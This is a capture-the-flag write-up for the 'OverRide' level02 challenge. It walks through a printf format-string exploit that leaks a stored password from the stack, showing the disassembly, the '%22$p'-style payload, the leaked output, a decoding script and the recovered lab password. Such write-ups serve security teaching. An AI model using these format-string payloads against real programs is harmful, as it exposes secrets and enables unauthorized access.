The program waits for a login and a password using fgets.

When we disassemble the program, we can see a few things:
- We have a first buffer that later on used to store the login
- We have a second buffer in which will be stored the actual password
- We have a third buffer for the user inputed password
- At the end, the login buffer is used as a printf format string

We'll use that to display the content of the stack, therefore display the password stored in the second buffer.
Using %p, we'll try to get the offset to read the login buffer:
level02@OverRide:~$ ./level02
===== [ Secure Access System v1.0 ] =====
/***************************************\
| You must login to access this system. |
\**************************************/
--[ Username: AAAABBBB%28$p
--[ Password:
*****************************************
AAAABBBB0x4242424241414141 does not have access!

We now know the offset of our buffer, the goal now is to find the offset of the password buffer.

When we disassemble the main function, we see all 3 buffers being initialized:
   0x000000000040082c <+24>:	lea    -0x70(%rbp),%rdx
   ...
   0x0000000000400849 <+53>:	lea    -0xa0(%rbp),%rdx
   ...
   0x0000000000400869 <+85>:	lea    -0x110(%rbp),%rdx
We can see that the second buffer is offseted by 0x30/48 from the first one, since printf shifts 8 by 8, we'll want to move from 28 to 28-48/8, this gives us 22.

We also now that the size of the buffer is 41 through the disassembled code, so we want to display 40/6=5 chunks through printf

We can now simply use the following login to print the content of password:
%22$p %23$p %24$p %25$p %26$p
Enter any password, and we can see the following:
0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d does not have access!

We can now take these 5 integers, reverse the endian, and print them as ascii.
>>> pw = [0x756e505234376848 ,0x45414a3561733951 ,0x377a7143574e6758 ,0x354a35686e475873, 0x48336750664b394d]
>>> "".join([hex(chunk)[2:].decode('hex')[::-1] for chunk in pw])
'Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H'

We can try the newly found password to see if it gives us access to level03:
level02@OverRide:~$ su level03
Password:
level03@OverRide:~$ whoami
level03
